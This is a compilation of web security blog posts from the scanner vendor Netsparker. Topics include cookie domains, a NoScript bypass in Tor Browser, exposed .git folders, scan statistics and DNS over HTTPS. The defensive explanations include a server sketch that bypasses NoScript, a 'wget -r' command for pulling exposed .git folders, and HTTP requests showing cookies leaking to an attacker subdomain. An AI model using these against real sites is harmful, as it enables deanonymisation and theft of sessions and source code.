
Analyzing Impact of WWW Subdomain on Cookie Security


With the release of Chrome 69, Google opted to hide the www and m subdomains from the address bar, claiming that they’re not used anymore and therefore don't need to be displayed in the address bar.

Is the www subdomain really as trivial as Google claims? This apparently tiny detail means a lot for cookies, which allow the stateless HTTP protocol to become more dynamic and user-friendly. In this article, we discuss the necessity of the www subdomain from the cookie security perspective and make a few recommendations.


A Short Introduction to Subdomains and Why We Use WWW

Today, HTTP – commonly referred to as the (world wide) web – has become the internet's most popular protocol. Years ago, this wasn't the case. The protocol a service used was often indicated by a subdomain, such as ftp.example.com, gopher.example.com, or mail.example.com.

There are various discussions about the necessity of the www subdomain. One aspect is the Same-Origin Policy (SOP), which only allows web pages on the same origin to talk to one another. The www subdomain doesn't really affect this isolation, though. Even if third parties share your second-level domain (SLD), for example ziyahan.example.com or mustafa.example.com (as is often the case with certain web hosts), they aren't permitted to access each other's DOM or that of example.com, regardless of the presence of www. However, if both ziyahan.example.com and example.com have pages that set JavaScript's document.domain property to the value 'example.com', they can access each other's DOM.

The Domain Attribute of Cookies

Cookies, which came into use in 1994, understand the concept of origin differently than the Same-Origin Policy (SOP), which was designed a year later. Cookies may contain domain, path, expires and name attributes, and flags like HttpOnly and Secure.

Let's examine the domain attribute in detail. The domain attribute specifies the domain for which the cookie is valid and tells the browser which websites the cookie may be sent to with a request. It is optional; if it is omitted, the host name the cookie was set from is used. If you use an IP address to access the website, you'll see this IP address in the value.

Website A cannot set a cookie belonging to website B, even if it specifies the domain attribute accordingly. Due to security measures, such attempts are blocked on both the server and client side. However, a cookie may be used on multiple subdomains belonging to the same domain. For instance, a cookie set for example.com may be sent along with requests to mail.example.com, calendar.example.com, and crm.example.com. The matching is done by comparing the cookie's domain and the hostname of the requested URL using the tail comparison method. This method compares the values from the end to the start (right to left), and the matching cookies are sent with the request.

This is how you set the domain attribute:

Set-Cookie: Scanner=Netsparker; domain=example.com
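
The tail comparison itself is easy to sketch. The following Python snippet is a simplified illustration of the matching logic, not the exact algorithm any particular browser uses:

def domain_matches(request_host: str, cookie_domain: str) -> bool:
    """Simplified tail comparison: does the cookie's domain attribute
    match the host of the requested URL?"""
    cookie_domain = cookie_domain.lstrip(".").lower()
    request_host = request_host.lower()
    # Exact match, or the requested host ends with ".<cookie domain>"
    return request_host == cookie_domain or request_host.endswith("." + cookie_domain)

# A cookie set with domain=example.com is also sent to subdomains:
print(domain_matches("mail.example.com", "example.com"))   # True
print(domain_matches("example.com", "example.com"))        # True
print(domain_matches("badexample.com", "example.com"))     # False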

This table shows a list of possible domain fields and to which domains the cookies will be sent by the browser.

The Domain That Sets the Cookie | The Domains the Cookie Will Be Sent to | The Domains the Cookie Will Not Be Sent to
www.example.com                 | www.example.com, *.www.example.com     | example.com, art.example.com, other.example.com
art.example.com                 | art.example.com, *.art.example.com     | example.com, www.example.com, other.example.com
.example.com                    | example.com, *.example.com             |

As illustrated in the table, domain values are very important for cookie security, especially on websites that have subdomains.

Before a cookie is sent with a request, the requested URL is compared against the domain value of the cookies found in the browser's memory (the cookie jar). The other criteria are checked only if the tail comparison matches.

The differences in how browsers handle this, the fact that the cookie domain attribute isn't fully understood, and the increasing trend of abandoning the www subdomain all add up to potential security breaches. We can illustrate this with an example.

Case Study of Setting Domain in Cookies

Let’s assume there are two accounts created on badsites.local:

  • victim.badsites.local
  • attacker.badsites.local

The users' websites are visible to anyone who visits them. If a user wants to make changes to their website, they have to log in to badsites.local and make the necessary changes in the control panel.

The “victim” user logs in to their control panel. This is the HTTP request for logging in:

POST http://badsites.local/control.php HTTP/1.1
Host: badsites.local
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

username=victim&password=victim

The response from the server can take three forms, depending on the domain value. We will observe how browsers react to each of these responses. The browsers used in this test are Chrome 69.0.3497.100, Internet Explorer 11, Mozilla Firefox 44.0.2, and Edge 42.17134.1.0:

Case 1: Domain Value of the Cookie is Not Set

This is what a Set-Cookie header looks like when the domain attribute is not set.

HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=ock3keuidn0t24vrf4hkvtopm0; path=/;

The four major browsers react similarly to the missing domain attribute and treat the cookie as valid only for the host that set it. However, older versions of Internet Explorer (such as 11.0.10240.17443) add the cookie to all requests sent to subdomains under badsites.local, causing a serious security breach.

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: attacker.badsites.local
Cookie: PHPSESSID=ock3keuidn0t24vrf4hkvtopm0

If the victim, or any other user logged in to badsites.local, visits attacker.badsites.local, the attacker will be able to take over their badsites.local session via attacker.badsites.local.

Chrome, Edge, IE 11 (except outdated IE 11 versions such as 11.0.10240.17443) and Firefox will not send the cookie with requests to the subdomains.

Case 2: Cookie Domain Value is Set as badsites.local:

As you can see, the domain attribute is now set to the main domain badsites.local.

HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=1fr54qg3j9rf77toohcpcsk8h0; path=/; domain=badsites.local;
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 66
Content-Type: text/html

IE, Edge, Chrome, and Firefox will send the cookie generated by badsites.local with requests to attacker.badsites.local.

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Host: attacker.badsites.local
Pragma: no-cache
Cookie: PHPSESSID=1fr54qg3j9rf77toohcpcsk8h0

Case 3: Cookie Domain Value is Set as .badsites.local:

In this case, the domain value is set to .badsites.local, with a leading dot.

HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=q3a20kfes2u6fgvgsrspv0rpf0; path=/; domain=.badsites.local
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

IE, Edge, Chrome, and Firefox will add the cookie to requests made for attacker.badsites.local.

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: tr,en-US;q=0.7,en;q=0.3
Proxy-Connection: Keep-Alive
Host: attacker.badsites.local
Cookie: PHPSESSID=q3a20kfes2u6fgvgsrspv0rpf0

The Importance of Setting Cookie Domains Correctly

As these cases show, cookie domain values have to be set with great care. If the correct values aren't supplied, your application might be at great risk. One option is to force the use of the www subdomain on all your domains. If you do, cookies will be limited to www.badsites.local addresses even if you leave the domain value empty.
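
As an extra layer of protection, also consider the Secure and HttpOnly flags. The sketch below (Python's standard library, purely for illustration; the session name and value are taken from the examples above) emits a Set-Cookie header without a domain attribute, so the cookie stays host-only:

from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["PHPSESSID"] = "ock3keuidn0t24vrf4hkvtopm0"
cookie["PHPSESSID"]["path"] = "/"
# No 'domain' attribute is set, so the browser treats this as a host-only
# cookie and only sends it back to the exact host that issued it.
cookie["PHPSESSID"]["secure"] = True    # only sent over HTTPS
cookie["PHPSESSID"]["httponly"] = True  # not readable from JavaScript

# Prints something like:
# Set-Cookie: PHPSESSID=ock3keuidn0t24vrf4hkvtopm0; HttpOnly; Path=/; Secure
print(cookie.output())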

In situations where you have to host websites with multiple users, do not host potentially risky content under your main domain. For example, websites that host user-supplied code, like GitHub, serve it under github.io instead of github.com.

Further Reading

Why you need a 'www'.

The definitive guide to cookie domains and why a www-prefix makes your website safer


NoScript Vulnerability in Tor Browser


Tor is the system preferred by users who wish to browse the internet anonymously. You can either set up Tor on its own on your computer or mobile device, or use it in conjunction with the Tor Browser.

Tor Browser is careful to maintain your privacy by protecting your IP and fingerprint, which are used to differentiate you from other users. For instance, Tor Browser warns you when you try to maximize the browser window, since you can be tracked based on the viewport size and screen resolution.

Tor Browser might pay extra attention to user privacy, but even Tor developers make mistakes. A 0-Day vulnerability was found in the NoScript extension, which made it possible to expose the identities of Tor users. This article explains how this script blocking extension works, and how it exposes the private information of Tor Browser users.

Script Blocking Feature

One security feature of Tor Browser is that it blocks all scripts from loading unless you tell it to do otherwise. Script loading is blocked on all websites, except the ones you whitelist, using the NoScript extension. This prevents your IP from being exposed by JavaScript code running on the page, such as a WebRTC connection request. All potentially vulnerable content, such as ActiveX controls and Flash objects, is also blocked.

The activation of the NoScript extension depends on the Content-Type of the page. If the NoScript extension comes across a context that can run scripts, such as a page with the Content-Type set to text/html, the extension immediately prevents the JavaScript code from running.



Running Scripts Even With NoScript Enabled

However, an alarming tweet by Zerodium on September 10 stated that a 0-Day vulnerability discovered in the NoScript extension might help expose the identities of Tor users.

Let’s take a brief look at the details of the vulnerability.

Details of the 0-Day Vulnerability in the NoScript Extension

In Tor Browser 7.x, the NoScript extension at its 'Safest' setting blocks all JavaScript code. However, it can be bypassed with a simple trick in the HTTP response, allowing JavaScript files to run. The attack works when the attacker adds the following HTTP header to the response:

Content-Type: text/html;/json

It seems that the code responsible for blocking scripts from loading parses the Content-Type header incorrectly. When it encounters the /json string at the end of the header, it assumes that the context can't execute scripts anyway, and therefore does not see the need to disable the script engine on that page.
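
To illustrate the idea, here is a simplified sketch of a malicious server (our own illustration, not the researcher's actual proof of concept): it serves an ordinary HTML page but appends /json to the Content-Type header, so the browser still renders it as HTML while the vulnerable NoScript version leaves the script engine enabled.

from http.server import BaseHTTPRequestHandler, HTTPServer

PAGE = b"<html><body><script>/* script that NoScript would normally block */</script></body></html>"

class MangledContentType(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # The trailing '/json' is what confused NoScript's Content-Type parsing.
        self.send_header("Content-Type", "text/html;/json")
        self.send_header("Content-Length", str(len(PAGE)))
        self.end_headers()
        self.wfile.write(PAGE)

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), MangledContentType).serve_forever()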

Conclusion

NoScript Classic fixed this vulnerability in the 5.1.8.7 update. All versions of Tor Browser from version 8.0 onwards include the updated version of the NoScript extension. Therefore, we recommend that Tor Browser users update their browsers immediately.

For further information, consult the Python Proof of Concept Code that exploits this issue, provided by the security researcher 'x0rz'.

How Does Netsparker Licensing Work?

  1. How can I activate my Netsparker installation?
  • You can activate your Netsparker installation using the License Key sent to you when you purchased Netsparker.
  2. How many activations can I have with a single Netsparker License Key?
  • You can have the same number of activations as the seats you have purchased.
  3. I need extra Netsparker license activations. What should I do?
  • Contact your Sales Representative to purchase extra seats to increase your License Key activation limit.
  4. How many websites can I scan with Netsparker Standard?
  • You can scan as many websites as you have purchased.
  5. I need extra websites for my Netsparker Standard license. What should I do?
  • Contact your Sales Representative to purchase extra websites to increase your license website limit.
  6. Where can I see and manage my current licenses in Netsparker Standard?
  • You can view and manage all your licenses in the Subscriptions dialog. From the Help tab, click Subscriptions.
  7. I purchased a Team or Enterprise solution. Can I also use your Netsparker Standard edition?
  • Yes, once you have logged in to your Netsparker Enterprise account, you can download Netsparker Standard, along with a separate key, from the Your Account > License window.
  8. I activated my license on a PC but I no longer have access to that PC (or it is inaccessible). How can I recover my Netsparker Standard license?
  • Contact our support team at support@netsparker.com to request a license deactivation. After our Support team examines your situation, we will deactivate the license on that PC so you can activate it on another one.
  9. I have lost my License Key. What should I do?
  10. I have noticed that my License Key is being used by an unauthorized third party. What should I do?
  • If you suspect that someone else is using your License Key, contact our Support team at support@netsparker.com as soon as possible. We can then deactivate and block unauthorized access to your License Key.
  11. Can I use my Netsparker Standard installation with different users on the same PC?
  • The best way to do this is to purchase a license with multiple user activation support. If you have not already done that, contact your Sales Representative to update your license.
  12. How do I request a Trial License?
  • You can request your trial license by completing our Get Demo form. Once you complete the form, Netsparker Standard will start to download. When the installation is complete, you can simply click Start Trial to begin using your 15-day Trial License.
  13. What websites can I scan using my Trial License?
  • You can only scan our test websites using your Trial License (php.testsparker.com, aspnet.testsparker.com).

The Dangers of Open Git Folders


Finnish computer scientist Linus Torvalds changed the world twice in his lifetime. The first time was roughly 25 years ago, when he wrote the Linux kernel; the second was when he developed the revolutionary Git – the open source, distributed version control system (VCS).

Git is a great system. However, if you mistakenly deploy your web application's version control files in a way that makes them publicly available along with your website, that could mean game over. In such a scenario, your website's source code, API tokens, and database passwords could be retrieved by attackers before you manage to take the files down.

Vladimir Smitka is a Czech security researcher who released his research notes on exposed Git version control system folders. His goal was to identify how common it is to find websites with openly retrievable Git repositories. In this article, we take a look at the security risks posed by version control system files, and the solutions, in light of Smitka's research.


How Prevalent Are Open Git Folders?

Let’s begin by analyzing the statistics in Smitka’s research notes:

  • After a two-day scan of Czech websites, he discovered that 1,950 out of 1.5 million websites had their Git folder open to the public.
  • Smitka then conducted a scan of Slovakian websites, uncovering 930 websites with their Git folder open to the public.

Smitka then enlarged his scope:

  • He scanned 230 million domains over four weeks, at a cost of only $250 – surprisingly inexpensive, considering the potential financial impact of just one breach
  • This global research resulted in a further list of 390 thousand domains which had their Git directories exposed
  • He compiled a detailed list of the specifications of the scanned domains at risk, which included a staggering 189,472 .com domains, followed by 85,202 .top domains

Smitka further enhanced his research by categorizing the results by the technology they used. He reported that vulnerable websites mostly used PHP and Apache servers – not surprising, given the prevalence of these technologies.

The Structure of Git

Let's now look at the structure of Git directories and folders.

This is an xkcd comic, supplied on their website under a Creative Commons license.

When you generate a Git repository (repo) using the git init command, a hidden directory named '.git' is created in the project folder. Similarly, when you clone a repo, you'll see that a '.git' directory is also created in the cloned folder. The .git directory should not be changed if you're not familiar with Git. It's a sensitive directory that holds all the information and files Git needs to work, such as the commit history and previous and current versions of the files.

This is a sample .git directory.

├── HEAD
├── branches
├── config
├── description
├── hooks
│   ├── pre-commit.sample
│   ├── pre-push.sample
│   └── ...
├── info
│   └── exclude
├── objects
│   ├── info
│   └── pack
└── refs
    ├── heads
    └── tags

In this example, the attacker would have access to all the source code for the website if they could reach the Git repository – including the current and previous versions of the code. Simply put, the .git folder should never be deployed, and if it is, it should never be open to public access.

How to Check if Your Git is Open to the Public

There are several ways to find out whether the .git folder is accessible to the public.

  • One of the easiest ways to do this is to try to access it by navigating to it in a browser (www.example.com/.git/).
    • If the .git folder was left on the server by mistake, and directory listing is enabled on your server, this URL will display a list of the contents of the directory.
    • If directory listing is disabled, you might get a 403 error, since there is no index.php or index.html in the .git directory. But this does not mean that everything is OK.
  • Another way to find out whether the folder is exposed is to access the URLs www.example.com/.git/HEAD or www.example.com/.git/config.

Since information about Git's folder structure is widely available, an attacker won't have any difficulty finding the code once they are in the directory. There are also many automated tools to help the attacker.
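
A quick check can also be scripted. The sketch below (standard library only; the URL is a placeholder, and you should only run it against sites you are authorized to test) requests /.git/HEAD and looks for content that resembles a real Git HEAD file:

import urllib.request

def git_exposed(base_url: str) -> bool:
    """Return True if <base_url>/.git/HEAD looks like a real Git HEAD file."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + "/.git/HEAD", timeout=10) as resp:
            body = resp.read(256).decode("utf-8", errors="replace").strip()
    except Exception:
        return False
    # A genuine HEAD file contains a symbolic ref or a 40-character commit hash.
    return body.startswith("ref:") or len(body) == 40

print(git_exposed("http://www.example.com"))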

Once the existence of the Git folder is confirmed and directory listing is enabled, it is simply a matter of downloading it using wget in recursive mode:

wget -r http://www.example.com/.git/

If directory listing is disabled you can use one of the readily available tools that allow you to download the folder.

How to Protect Git Folders From Attackers

  • Don't leave your .git folder in the production environment! If you can't avoid that, you should at least move it out of the web root directory, because web servers only serve files under the web root.
  • Another method is to block access to all directories that begin with '.'. However, the '.well-known' directory is an exception. This directory is defined by RFC 5785 and is used to hold website metadata, such as DNT, Let's Encrypt validation, and security.txt files. Therefore, when you're setting a rule to block access to files and folders that begin with '.', you should take this exception into consideration:

Nginx:

location ~ /\.(?!well-known\/) {
    deny all;
}

Apache:

<Directory ~ "/\.(?!well-known\/)">
    Order deny,allow
    Deny from all
</Directory>

Caddy Server:

status 403 /blockdot
rewrite {
    r /\.(?!well-known\/)
    to /blockdot
}

Conclusion

In light of Smitka's research, it appears that open Git folders remain a glaring global web application security problem that has not yet been seriously addressed. For now, applying the proper restrictions on files that begin with a dot, as suggested above, will help protect the sensitive .git directory and prevent a large-scale takeover of your website. It is important to know where your website's folders and files are and whether they can be accessed by malicious hackers.

If you'd like to find out more about the research that inspired this blog post, see Global scan - exposed .git repos.

Netsparker to Exhibit at OWASP AppSec USA 2018 in San Jose


Netsparker is sponsoring and exhibiting at OWASP AppSec USA 2018. The conference exhibit will take place from October 11th until the 12th at the Fairmont San Jose.

OWASP AppSec USA 2018 - Sponsored by netsparker

Join Us at the Diamond Sponsor Booth at OWASP AppSec USA 2018

If you are attending OWASP AppSec USA, stop by our Diamond Sponsor booth. Our team will be happy to talk to you and answer any questions you might have about automated vulnerability scanning and scaling up web application security.

For more information about the conference, visit the official OWASP AppSec USA 2018 website.

$100 Discount Code for OWASP AppSec USA 2018!

If you don't yet have your OWASP AppSec USA tickets, use the code USA18NTSPKR100 when registering to get a $100 discount.

We look forward to seeing you there!

Netsparker's Web Security Scan Statistics for 2018


On average, the online edition of the Netsparker web security solution identifies a vulnerability every 4.59 minutes. Since its launch in early 2015, it has identified a total of 156,904 security issues. From the beginning of this year until the fifth of October, it detected 87,195 vulnerabilities across 4,469 websites.

Netsparker Scan Statistics 2018

If that doesn't make you want to start scanning your web applications for security issues right now, we don't know what would.

We are always curious about what technologies Netsparker users employ to build their web applications, and keen to stay ahead of the hackers. So we extracted data from the online edition of Netsparker and here is our report.

Identified Vulnerabilities Since the Beginning of 2018

Table of Contents

  1. How Many Vulnerabilities Does Netsparker Detect and Verify?
    1. How Does Netsparker Confirm the Vulnerabilities?
  2. What Types of Technologies Do Netsparker Users Operate?
  3. What Type of Security Vulnerabilities Were Detected?
    1. Cross-site Scripting
    2. SQL Injection
    3. Out of Date Software
  4. Adoption of Client-side Web Security Features
    1. SSL / TLS Issues
    2. Content Security Policy
    3. Subresource Integrity
    4. Other Security Checks Using HTTP Headers
  5. What Do These Web Application Security & Vulnerabilities Statistics Say?
    1. XSS vs SQL Injection
    2. Out of Date Software Is A Big Issue
    3. Security Beyond The Code - Use All Resources Available
  6. How Much Time and Resources Does it Take to Identify a Single Vulnerability?

How Many Vulnerabilities Does Netsparker Detect and Verify?

To start off with, 50,489 (32.18%) of the vulnerabilities Netsparker identified were categorised as High Severity and are critical issues. This should give you some idea of the statistics to follow.

An interesting fact is that out of the 156,904 vulnerabilities Netsparker identified, 30,164 (19.2%) have a probable/possible status, while around 80.8% of all identified vulnerabilities were confirmed automatically with Proof-Based Scanning™, which means they are definitely not false positives.

 Total number of vulnerabilities identified by Netsparker

How Does Netsparker Confirm the Vulnerabilities?

Netsparker pioneered and uses an exclusive technology called Proof-Based Scanning™. When Netsparker identifies a vulnerability it tries to automatically verify it by exploiting it in a read-only and safe way. And if a vulnerability is exploitable, then it is definitely not a false positive.

Upon exploiting the vulnerability, the solution also generates a proof of exploit, highlighting the impact the exploited vulnerability could have on the target website. Netsparker can automatically exploit vulnerabilities that have a direct impact and that are difficult to reproduce or require technical expertise, such as SQL Injection, XSS, Code Evaluation and second order vulnerabilities.

Vulnerabilities without a direct impact, such as IP address or email address disclosure, cannot be automatically verified. However, these types of issues can be verified manually very easily, without requiring any technical expertise.

So by automatically verifying 80% of the identified vulnerabilities, Netsparker is helping businesses save days and weeks of man hours, allowing small teams to do much more and ensure the security of their web applications with far fewer resources.

What Types of Technologies Do Netsparker Users Operate?

We examined the types of web servers and technologies Netsparker users operate. We found that Apache and IIS were by far the most commonly used web servers, while PHP and .NET were the most popular web app technologies.

Technologies and Web Server Types Identified

What Type of Security Vulnerabilities Were Detected?

Cross-site Scripting

Cross-Site Scripting (XSS) has been around for a very long time and is known to almost all developers. So it's surprising that it accounts for around one quarter of all detected vulnerabilities, a total of 40,908 issues, 1,269 of which were DOM-based XSS. Cross-site scripting vulnerabilities are very difficult to get rid of, though they are very easy to detect automatically with the Netsparker web security solution.


SQL Injection

Netsparker detected 3,441 SQL injection vulnerabilities, which make up just over 2% of the total. Given that SQL injection was once so prevalent, and that it is still the top vulnerability in the OWASP Top 10 list of most critical web application security flaws, these are impressive results. It seems that new frameworks and prepared statements may have played a role in reducing this proportion. In addition, while we see fewer classic SQLi vulnerabilities, we encounter more complex variants of this injection, such as Boolean-based, Blind, and Out-of-Band (OOB), all of which make up part of this number. Exploiting those types is much more difficult and only something an experienced hacker would tackle.


The Netsparker web application security solution always generates a proof of exploit when it identifies a SQL injection vulnerability, meaning there is no need to manually check that a detected vulnerability is exploitable.

Out of Date Software

Clever, malicious and driven hackers aside, out of date software is still a big issue, even though it is one of the quickest and easiest security gaps to close. Equifax and Mossack Fonseca made international news, yet….


Out of date software accounts for approximately 5% of all security issues. The severity varies, though:

  • Since launch, Netsparker has detected 8,775 Out of Date Software issues
  • 1,221 were outdated web server software
  • 70 were out of date database servers.

Site owners should assume nothing and update their software as soon as updates become available.

Adoption of Client-side Web Security Features

Nowadays there are plenty of defense in depth features developers can use to improve the security of their web applications, such as Subresource Integrity and Content Security Policy. Their absence does not necessarily mean the web applications have a specific vulnerability, though Netsparker will report them if they are missing or misconfigured, because they are recommended best practices.

Other Non Web Application Security Issues

SSL / TLS Issues

It is quite surprising that we are still seeing these types of SSL / TLS issues, especially when HTTPS is fast becoming the de facto protocol of the web. Netsparker discovered:

  • 960 issues with mixed content over HTTP/HTTPS
  • 545 invalid SSL certificates

Content Security Policy

Content Security Policy (CSP) is a relatively new standard, though it has gained a lot of popularity. It can be a bit of a task to configure CSP properly, and an insecure configuration can lead to security issues. From the scans we can see that:

  • 4,067 sites do not have CSP enabled
  • There were 5,792 issues with the CSP implementations of the scanned applications

Subresource Integrity

Subresource Integrity (SRI) should be implemented on every web application that loads scripts and other third-party code from CDNs and other external sources. SRI is used to ensure that code loaded from third parties has not been altered, so it is very important and allows you to rely on third-party resources with less worry. Out of the 4,469 targets scanned, 1,912 did not have SRI implemented.
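
Generating the integrity value for a resource is straightforward. The sketch below computes the sha384 value that goes into a script or link tag's integrity attribute (the file name is just an example):

import base64
import hashlib

def sri_hash(path: str) -> str:
    """Compute a Subresource Integrity value (sha384-<base64 digest>) for a local file."""
    with open(path, "rb") as f:
        digest = hashlib.sha384(f.read()).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")

# The printed value would be placed in the 'integrity' attribute of the
# <script> or <link> tag that loads this file from a CDN.
print(sri_hash("jquery-3.3.1.min.js"))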

Other Security Checks Using HTTP Headers

There are a number of security features that can be used in web applications to protect against exploitation of cross-site scripting (XSS) vulnerabilities, to ensure integrity of issued encryption certificates and more. Below are some of the issues Netsparker highlighted in target web applications:

  • Expect-CT HTTP header issues: 4,069 (2,111 of which because the header is not enabled)
  • Missing X-Frame-Options header: 2,809
  • Missing X-XSS-Protection header: 4,297

What Do These Web Application Security & Vulnerabilities Statistics Say?

There are several conclusions one can come up with after studying these statistics. Here are some of our thoughts on these numbers.

XSS vs SQL Injection

Injection vulnerabilities have occupied the number one spot in the OWASP Top 10 list of most critical security flaws since it started. However, in all the statistics we've gathered (not just these), Cross-site Scripting (XSS) is by far the more common vulnerability. This should not be a surprise: nowadays, developers have plenty of resources for writing code that is not vulnerable to SQL injection, such as prepared statements, and new frameworks protect against SQL injection by default, making it quite hard to write insecure SQL code. XSS vulnerabilities, on the other hand, are much more complex to address, and even when the framework has built-in protection, it's very easy to make mistakes.

Out of Date Software Is A Big Issue

It is impossible not to have third party frameworks, libraries or code in a custom built web application. Why not? Why should you reinvent the wheel when you can simply plug in new code and functionality?

However, these third-party frameworks, code snippets and libraries can also have vulnerabilities, so it is important to keep them up to date. Keeping software up to date should be one of the easier security best practices to follow, yet many are failing at it, as we have seen in the Panama Papers leak and Equifax's massive data breach.

Netsparker is a web security solution that can help you with this. It has a dedicated scanning engine for off-the-shelf components, such as libraries, frameworks and other third party code you might be using on your web applications. If Netsparker identifies a vulnerability in any of these components, it highlights the issue so you can update the software.

Security Beyond The Code - Use All Resources Available

TLS, Subresource Integrity, Content Security Policy and several other security features can help you build more secure web applications and web servers. Some of them are very easy to integrate and can definitely save you a lot of hassle. Defense in depth is something you should always strive for when building secure systems.

For example, when the CDN used by the Associated Press, The New York Times, CNN and the Washington Post mobile site was hacked, their readers wouldn't have seen messages from the hacking group Syrian Electronic Army (SEA) if those sites had been using Subresource Integrity. So go ahead and use such security measures, though always scan the setup with Netsparker, because a misconfiguration can render these features useless and give a false sense of security.

How Much Time and Resources Does it Take to Identify a Single Vulnerability?

We could go on forever about what the above numbers mean, though the most important one, which really makes a big difference and helps your security team identify and fix as many vulnerabilities as possible, is the fact that 80% of the identified vulnerabilities were automatically verified. What does this mean?

Netsparker is the only solution that employs Proof-Based Scanning™ to prove that a vulnerability is not a false positive. How effective do you think such a feature is? How many resources (financial and manpower) can businesses save with it? Try this little exercise to find out how much time you need to identify a real vulnerability:

    • Think of how long it takes to conduct a vulnerability assessment on all your web applications
    • Add on the amount of time it took your seasoned security consultants or team to manually verify the identified vulnerabilities and document all info into a report so developers can fix it
    • Divide that time by the number of actual vulnerabilities or issues you discovered

Now you should have a very rough estimate of how long, on average, it takes you to discover a vulnerability and figure out what to do with it. If the figure you came up with is measured in days rather than minutes – soul-destroying, we know – you can guess what's coming next.

With Proof-Based Scanning™ you do not need to do the second step mentioned in the above exercise, which is the most time-consuming part and the one that requires the most technical expertise. The solution does it all for you.

Just a reminder that Netsparker finds a vulnerability every 4.59 minutes! It also provides a scan summary, technical report, downloadable scan data, proof of exploit, and a list of issues along with their impacts and remediation details.

Manual vulnerability testing sounds a little crazy when you realise just how much time you could save by using the Netsparker web application security solution.

Authors, Netsparker Security Researchers:

Sven Morgenroth
Ziyahan Albeniz
Robert Abela
Dawn Baird

Netsparker to Exhibit at Black Hat Europe 2018 in London‎


This year, Netsparker will exhibit at Black Hat Europe 2018 in London‎. The Business Hall will be open from December 5th until the 6th at Excel London‎.


Join Us at Booth #802 at Black Hat Europe 2018

Members of our team will represent Netsparker at booth #802. Our team will be available to answer any questions you might have about automatically detecting vulnerabilities in your websites and web applications.

Visit the Black Hat Website for a copy of the agenda and more information about the event.

We look forward to meeting you there!

Pros and Cons of DNS Over HTTPS


DNS, the Domain Name System, is the internet-wide service that translates fully qualified domain names (FQDNs) such as www.netsparker.com into IP addresses. It was developed because it's much easier to remember a domain name than an IP address.

In 2017, an internet draft proposing to send DNS requests over HTTPS was submitted to the IETF by P. Hoffman (from ICANN) and P. McManus (from Mozilla). Was this a positive move toward a more secure internet, or will it only create more problems?


In this article we dig deep into the subject, explaining our angle on the pros and cons of running DNS over HTTPS.

What is the DNS and How Does It Work?

First, let's refresh our memories on how DNS works. When you visit https://www.netsparker.com the following happens:

  1. Your browser sends a request to a recursive domain name server (DNS) that is configured on your computer. Let’s call this DNS server 8.8.8.8.
  2. Since 8.8.8.8 does not know the IP address of www.netsparker.com, it queries the internet root servers, which refer 8.8.8.8 to the nameserver responsible for the .com top level domain (TLD).
  3. Next, 8.8.8.8 asks the .com TLD name server for the name servers of the netsparker.com domain.
  4. Then, 8.8.8.8 asks the netsparker.com name servers for the IP address of the FQDN www.netsparker.com. Once the server gets the response, it forwards it to the web browser.
  5. The web browser connects to this IP address and requests the website www.netsparker.com.
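
From an application's point of view, all of these steps are hidden behind a single resolver call; for example, this small Python snippet asks the system's configured recursive resolver (8.8.8.8 in our example) to do the work:

import socket

# The recursion described above happens behind the scenes; the application
# simply receives the resolved addresses for the FQDN.
for family, _, _, _, sockaddr in socket.getaddrinfo("www.netsparker.com", 443):
    print(family.name, sockaddr[0])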

How Far Does DNS Lag Behind?

Back in 1983, when DNS had just been invented, DNS requests and responses were sent over the internet in clear text, and they still are. Now, with so much at stake on the internet, there is a clear need to encrypt DNS traffic.

However – like many other fundamental building blocks of the modern web – DNS was not ready for the hype!

Unlike other protocols such as HTTP and FTP, DNS never got a security upgrade that prompted widespread adoption. Instead, one of the most important features of our modern internet has used the same level of encryption for the last 35 years – none at all!

Introducing DNS Over HTTPS

In 2017, following years of unencrypted DNS requests, the first IETF Internet Draft (I-D) for DNS over HTTPS (DoH) was published. It is a precursor to an official RFC document, and you can read the 13th revision of the initial draft, DNS Queries over HTTPS (DoH), though the RFC is not yet finalised. It isn't the only protocol that aims to add encryption to DNS (there is also DNS over TLS and DNSCrypt), but it's the one that companies such as Mozilla and Google chose to integrate into their products.

Let's take a look at how it works and why it's probably not the solution to all DNS privacy problems.

DNS over HTTPS – Technical Basics

First, let's look at the technical aspects described in the latest Internet Draft and implemented in real-world applications.

The client sends a DNS query via an encrypted HTTP request – not a shocking revelation, given the name of the protocol. There are two possible ways to send the data – via a GET or POST request. Each has its own characteristics and advantages.

GET and POST Requests

If you send the data via a POST request:

  • The Content-Type header field indicates the media type:
    • The I-D describes one media type (application/dns-message), but the major DoH providers we'll talk about use another one (application/dns-json) that is better suited for web applications.
  • The DNS query is sent in the message body:
    • This has the additional advantage that you don't need to encode the message
  • The message size is smaller than sending it with a GET request:
    • As described above, this has to do with encoding

If you send the data via a GET request:

  • It's bigger than a POST request:
    • The encoding that you need to use is base64url, which means that the encoded message is about one third larger than the original one
  • It's HTTP Cache-friendly:
    • Caching GET requests is well supported even in older cache servers
  • The DNS query is sent in a GET parameter
    • This is not surprising, since the I-D mentions 'dns' as the GET parameter name

However, even though GET requests are more cache-friendly than POST requests, there is still one problem. DNS packets usually have an ID field that is used to correlate request and response packets. It is a random identifier, so it results in different request URLs for what is essentially the same query, which would defeat HTTP caching. Therefore, clients should set this ID field to '0'.

This demonstrates that porting DNS from cleartext UDP/TCP to encrypted HTTPS requires some adjustments, at least if you want to use HTTP's full potential (which is advisable since HTTPS comes with quite a bit of overhead compared to the simple, unencrypted wire protocol of DNS).
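
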